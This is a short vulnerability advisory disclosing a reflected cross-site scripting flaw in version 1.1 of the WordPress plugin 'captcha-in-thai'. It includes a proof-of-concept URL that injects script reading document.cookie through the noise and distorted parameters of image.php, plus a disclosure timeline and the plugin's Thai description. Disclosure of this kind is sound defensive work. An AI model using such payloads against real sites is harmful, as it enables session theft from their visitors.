wp-plugin : captcha-in-thai

Plugin Details
Plugin Name: wp-plugin : captcha-in-thai
Effected Version : 1.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/captcha-in-thai/image.php?noise=noise'><script>alert(document.cookie)</script>&font_size=1&distorted=a'><script>alert(document.cookie)</script>&font_color=1&bg_color=1

 

Vulnerable Parameter : noise, distorted

 

Type of XSS : Reflected


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on 2014-01-11
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[| CAPTCHA in Thai เป็นการบริการฟรีแคปต์ชา ที่เป็นภาษาไทย ในลักษณะของการแก้ไขคำที่มักเขียนผิด คำอ่าน และสุภาษิตต่างๆ เพื่อช่วยป้องกันเว็บไซต์ของท่านจากสแปม ท่านสามารถติดตั้งใช้ได้หลายส่วน ได้แก่ การเข้าสู่ระบบ, การลงทะเบียนและการแสดงความคิดเห็น นอกจากนี้การใช้ CAPTCHA in Thai เป็นการส่งเสริมให้ผู้ใช้งานสามารถใช้ภาษาไทยได้ถูกต้องอีกด้วย = การทำงาน = 1. เมื่อผู้ใช้เข้าหน้าที่ถูกตั้งค่าให้ใช้งานแคปต์ชา จะมีการร้องขอภาพคำถามจาก server โดยมีการส่ง ip address ของผู้ที่ต้องตอบแคปต์ชา และ hostname ที่ติดตั้งปลั๊กอิน เพื่อใช้ในการเก็บสถิติไปด้วย 2. เมื่อผู้ใช้ ทำการกรอกข้อมูลในหน้านั้นๆ พร้อมกับคำตอบของแคปต์ชา ปลั๊กอินจะส่งคำตอบกลับไปตรวจสอบที่เซิฟเวอร์ พร้อม ip address ของผู้ตอบ และชื่อ hostname ที่ติดตั้งปลั๊กอิน จากนั้นเซิฟเวอร์จะทำการส่งข้อมูลว่าถูกหรือผิดกลับมา = ปลั๊กอินนี้จะช่วยอะไรคุณได้บ้าง: = * ช่วยให้เว็บของคุณมีการป้องกันสแปมผ่านแคปต์ชา ในรูปแบบภาษาไทย * สามารถเลือกการใช้บริการได้หลากหลายรูปแบบ ได้แก่ คำที่มักเขียนผิด คำอ่าน และสุภาษิต และเรียกใช้ได้หลายส่วนการทำงาน * สามารถเลือกสีของตัวอักษร, สีของพื้นหลัง, รูปแบบของตัวอักษรได้ * สามารถเลือกเลือกระดับของการป้องกันได้ * มีระบบ Offline ป้องกันในกรณีที่ไม่สามารถติดต่อกับเซิร์ฟเวอร์ของเราได้ = Credit = * การจัดทำปลั๊กอินแคปต์ชาในภาษาไทย เป็นส่วนหนึ่งของการทำโครงงานในวิชา CN405 COMPUTER ENGINEERING PROJECT II คณะวิศวกรรมศาสตร์ ภาควิชาไฟฟ้าและคอมพิวเตอร์ มหาวิทยาลัยธรรมศาสตร์ โดยมีอาจารย์ วชิรา พรหมสาขา ณ สกลนคร เป็นอาจารย์ที่ปรึกษา * Source code ของ Color Picker จาก jscolor.com * ปลั๊กอิน captcha ที่นำมาศึกษา ของ BestWebSoft ]